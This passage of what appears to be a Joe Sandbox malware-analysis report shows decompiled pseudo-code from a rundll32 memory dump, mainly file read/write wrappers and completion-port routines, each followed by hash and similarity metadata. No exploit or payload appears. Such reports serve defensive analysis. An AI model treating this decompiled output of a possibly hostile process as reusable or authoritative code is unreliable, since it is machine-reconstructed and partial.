                				intOrPtr* _v32;
                				char _v40;
                				void* __rdi;
                				void* _t17;
                				intOrPtr* _t43;
                				void* _t55;
                
                				_a8 = __rbx;
                				_a24 = __rsi;
                				_a32 = r9w;
                				_t55 = __rdx;
                				if (__rdx != 0) goto 0xc80d3b42;
                				if (__r8 == 0) goto 0xc80d3b42;
                				if (__rcx == 0) goto 0xc80d3b3b;
                				 *__rcx =  *__rcx & __edx;
                				goto 0xc80d3bd1;
                				if (__rcx == 0) goto 0xc80d3b4a;
                				 *__rcx =  *__rcx | 0xffffffff;
                				if (__r8 - 0x7fffffff <= 0) goto 0xc80d3b66;
                				_t17 = E00000285285C80D3944(__rax);
                				 *__rax = 0x16;
                				E00000285285C80CAABC(_t17);
                				goto 0xc80d3bcf;
                				E00000285285C80CA5D4(__rax, __rcx,  &_v40, _a40);
                				_t43 = _v32;
                				if ( *((long long*)(_t43 + 0x138)) != 0) goto 0xc80d3c00;
                				if ((_a32 & 0x0000ffff) - 0xff <= 0) goto 0xc80d3be3;
                				if (_t55 == 0) goto 0xc80d3bb0;
                				if (__r8 == 0) goto 0xc80d3bb0;
                				E00000285285C80C8EF0(0xff, 0, __edi, __esp, _t55, _a40, __r8, __r8);
                				E00000285285C80D3944(_t43);
                				 *_t43 = 0x2a;
                				if (_v16 == 0) goto 0xc80d3bcf;
                				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
                				return 0x2a;
                			}












                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                • String ID:
                • API String ID: 4141327611-0
                • Opcode ID: b3cd6b7fc60e91ab56e39b8c7ca69b1ba7915d71728f58b11bac7416403998d9
                • Instruction ID: 764fd098a7b3c89efb6a23a10319ef88cf39aad127ff03d3e6c19272ef525e70
                • Opcode Fuzzy Hash: b3cd6b7fc60e91ab56e39b8c7ca69b1ba7915d71728f58b11bac7416403998d9
                • Instruction Fuzzy Hash: E541A87E207FA086FB659F54D148369A690EB40BA0F16C12BDF9527AD5EF3CC8468F01
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 43%
                			E00000285285C8089A80(void* __esi, void* __ebp, long long __rbx, void* __rcx, long long* __rdx, long long __rdi, long long __rsi, void* __rbp, long long __r8, void* __r9, long long _a16, long long _a24, long long _a32, void* _a40, intOrPtr _a72, long long _a88, void* _a96, long long _a120, void* _a128, intOrPtr _a136, void* _a144, long long _a152) {
                				int _t34;
                				long _t35;
                				void* _t39;
                				long long _t73;
                				void* _t85;
                				void* _t86;
                
                				_a16 = __rbx;
                				_a32 = __rdi;
                				_a24 = __r8;
                				if ( *((intOrPtr*)(__rdx + 8)) != 0) goto 0xc8089aaf;
                				 *((intOrPtr*)(__rdx + 8)) = GetCurrentThreadId();
                				goto 0xc8089ac1;
                				if ( *((intOrPtr*)(__rdx + 8)) == GetCurrentThreadId()) goto 0xc8089ac1;
                				 *((intOrPtr*)(__rdx + 8)) = 0xffffffff;
                				asm("lock inc dword [eax+0x30]");
                				if ( *__rdx != 0xffffffff) goto 0xc8089af6;
                				r9d = 0;
                				r8d = 0x2719;
                				_pop(_t85);
                				goto E00000285285C8089130;
                				if ( *((long long*)(_t85 + 8)) != 0) goto 0xc8089b21;
                				r9d = 0;
                				r8d = 0;
                				_pop(_t86);
                				goto E00000285285C8089130;
                				_a120 = __rsi;
                				_t73 = _a152;
                				_a136 = 0;
                				_a88 = _t73;
                				 *((long long*)(_t73 + 0x10)) =  *((intOrPtr*)(__rcx + 0x28));
                				r8d =  *(_t86 + 8);
                				_t34 = WriteFile(??, ??, ??, ??, ??);
                				_t35 = GetLastError();
                				if (_t34 != 0) goto 0xc8089b7f;
                				if (_t35 == 0x3e5) goto 0xc8089b7f;
                				if (_t35 == 0xea) goto 0xc8089b7f;
                				r9d = _a136;
                				r8d = _t35;
                				E00000285285C8089130(_t39, _t35 - 0xea,  *((intOrPtr*)(__rcx + 0x28)), _a72,  *((intOrPtr*)(_a88 + 0x28)), _t73, _a88, _t73);
                				goto 0xc8089b8b;
                				return E00000285285C8089090(_a72,  *((intOrPtr*)(_a88 + 0x28)), _t73, _t73);
                			}










                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CurrentThread$ErrorFileLastWrite
                • String ID:
                • API String ID: 1327375210-0
                • Opcode ID: 590f503f063f945f456afbfa2fe40aa4c10ad34da1b69bc37942898db11d761e
                • Instruction ID: 8a23e034a26bd1f9d75bc38e59b3eedddd25227a6eced3fb480a6b33062d920d
                • Opcode Fuzzy Hash: 590f503f063f945f456afbfa2fe40aa4c10ad34da1b69bc37942898db11d761e
                • Instruction Fuzzy Hash: 4C313E3A205FA086E720DB66E14871AA7A0F788BE4F148613DF5957B98CF7CD491CF00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 43%
                			E00000285285C8089BB0(void* __esi, void* __ebp, long long __rbx, void* __rcx, long long* __rdx, long long __rdi, long long __rsi, void* __rbp, long long __r8, void* __r9, long long _a16, long long _a24, long long _a32, void* _a40, intOrPtr _a72, long long _a88, void* _a96, long long _a120, void* _a128, intOrPtr _a136, void* _a144, long long _a152) {
                				int _t34;
                				long _t35;
                				void* _t39;
                				long long _t73;
                				void* _t85;
                				void* _t86;
                
                				_a16 = __rbx;
                				_a32 = __rdi;
                				_a24 = __r8;
                				if ( *((intOrPtr*)(__rdx + 8)) != 0) goto 0xc8089bdf;
                				 *((intOrPtr*)(__rdx + 8)) = GetCurrentThreadId();
                				goto 0xc8089bf1;
                				if ( *((intOrPtr*)(__rdx + 8)) == GetCurrentThreadId()) goto 0xc8089bf1;
                				 *((intOrPtr*)(__rdx + 8)) = 0xffffffff;
                				asm("lock inc dword [eax+0x30]");
                				if ( *__rdx != 0xffffffff) goto 0xc8089c26;
                				r9d = 0;
                				r8d = 0x2719;
                				_pop(_t85);
                				goto E00000285285C8089130;
                				if ( *((long long*)(_t85 + 8)) != 0) goto 0xc8089c51;
                				r9d = 0;
                				r8d = 0;
                				_pop(_t86);
                				goto E00000285285C8089130;
                				_a120 = __rsi;
                				_t73 = _a152;
                				_a136 = 0;
                				_a88 = _t73;
                				 *((long long*)(_t73 + 0x10)) =  *((intOrPtr*)(__rcx + 0x28));
                				r8d =  *(_t86 + 8);
                				_t34 = ReadFile(??, ??, ??, ??, ??);
                				_t35 = GetLastError();
                				if (_t34 != 0) goto 0xc8089caf;
                				if (_t35 == 0x3e5) goto 0xc8089caf;
                				if (_t35 == 0xea) goto 0xc8089caf;
                				r9d = _a136;
                				r8d = _t35;
                				E00000285285C8089130(_t39, _t35 - 0xea,  *((intOrPtr*)(__rcx + 0x28)), _a72,  *((intOrPtr*)(_a88 + 0x28)), _t73, _a88, _t73);
                				goto 0xc8089cbb;
                				return E00000285285C8089090(_a72,  *((intOrPtr*)(_a88 + 0x28)), _t73, _t73);
                			}










                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CurrentThread$ErrorFileLastRead
                • String ID:
                • API String ID: 895653707-0
                • Opcode ID: 247f43cfc954d39203f53dc2233411e47b8fdd5f97424ed2fa319d8570cd04a2
                • Instruction ID: ccb2115257c8f26245faf46a55ccbb8775d3be540504e9cc5a25ab669bd70c37
                • Opcode Fuzzy Hash: 247f43cfc954d39203f53dc2233411e47b8fdd5f97424ed2fa319d8570cd04a2
                • Instruction Fuzzy Hash: 23314F3A215FA086E7209B66E54871AB7A0F788BE4F148613EF5957B98CF3DD491CF00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00000285285C808BE70(void* __rdx) {
                
                				if (__rdx != 0) goto 0xc808be82;
                				return 0;
                			}



                0x285c808be77
                0x285c808be81

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 39e2ae9d972135b19e8721c0c272893ea021ef14bacb15c7e938a42317222523
                • Instruction ID: 947a62c7b10fd9e17ba8596d35871d2a4837052fde5ea69f03e04d1724cd3bfc
                • Opcode Fuzzy Hash: 39e2ae9d972135b19e8721c0c272893ea021ef14bacb15c7e938a42317222523
                • Instruction Fuzzy Hash: 7CF0BEA9703E1556EE1CF71580AA36C05A2E7597F0F808726A33D557C6AD8C40818B01
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E00000285285C8063DF0(long long __rax, long long __rbx, void* __rcx, void* __rdx, long long _a8) {
                				char _v56;
                				long long _v64;
                				long long _v72;
                				char _v80;
                				long long _v88;
                				void* _t34;
                				void* _t35;
                				long long _t47;
                				long long _t61;
                				void* _t62;
                
                				_t50 = __rbx;
                				_t47 = __rax;
                				_v88 = 0xfffffffe;
                				_a8 = __rbx;
                				_t3 = __rcx + 0x34;
                				 *_t3 = 1;
                				if ( *_t3 != 0) goto 0xc8063ec7;
                				_t5 = __rcx + 0x38;
                				 *_t5 = 1;
                				if ( *_t5 != 0) goto 0xc8063ec7;
                				r9d = 0;
                				r8d = 0;
                				if (PostQueuedCompletionStatus(??, ??, ??, ??) != 0) goto 0xc8063ec7;
                				_t34 = GetLastError();
                				E00000285285C805F380( *((intOrPtr*)(__rcx + 0x28)), __rdx);
                				_t61 = _t47;
                				_v80 = _t47;
                				_v72 = _t47;
                				if ( *((intOrPtr*)(_t61 + 8)) + 0xda812030 - 1 <= 0) goto 0xc8063e7d;
                				 *((intOrPtr*)( *_t61 + 0x30))();
                				goto 0xc8063e82;
                				_v64 = 0xda812030;
                				_v80 = _t34;
                				_v72 = _t61;
                				if (((0 | _t34 != 0x00000000) & 1) == 0) goto 0xc8063ec7;
                				if (0x4d54ee85da812032 != 1) goto 0xc8063ea5;
                				if (_t34 == 0) goto 0xc8063ec7;
                				E00000285285C8060B90(_t35, __rbx,  &_v56,  &_v80, "pqcs");
                				return E00000285285C806DF30(_t34, _t50,  &_v56, _t62, "pqcs");
                			}














                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CompletionErrorLastPostQueuedStatus
                • String ID: pqcs
                • API String ID: 1506555858-2559862021
                • Opcode ID: c5c792db30b7c14ccf9868605fe78f4305e3ec2e17efe680536f6939b843083c
                • Instruction ID: d6b8c93fdfc3d8d4a69478d3b7c5ee3d3f94e9022efdd8a3fb207f8b621dfa3b
                • Opcode Fuzzy Hash: c5c792db30b7c14ccf9868605fe78f4305e3ec2e17efe680536f6939b843083c
                • Instruction Fuzzy Hash: 5921F336B12F9086EBA08B16A48475E23A0F785794F10D22ADEAD937D4DF3CC855CF40
                Uniqueness

                Uniqueness Score: -1.00%